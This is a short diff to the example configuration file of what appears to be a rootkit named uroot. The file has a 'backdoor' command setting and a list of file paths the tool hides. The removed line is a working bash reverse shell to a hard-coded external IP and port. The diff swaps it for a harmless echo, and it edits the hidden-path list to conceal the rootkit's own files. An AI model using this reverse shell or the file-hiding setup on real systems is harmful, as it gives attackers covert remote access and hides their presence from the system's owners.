--- a/example/uroot.cfg
+++ b/example/uroot.cfg
@@ -1,5 +1,7 @@
-backdoor = "bash -c 'bash -i >& /dev/tcp/123.249.89.38/50001 0>&1'";
+backdoor = "bash -c 'echo 't123abc'";
 
 hidden = (  
-  { path = "/etc/cerez.cfg" }
+  { path = "/etc/uroot.cfg" },
+  { path = "/tmp/test" },
+  { path = "uroot.cfg" }
 );
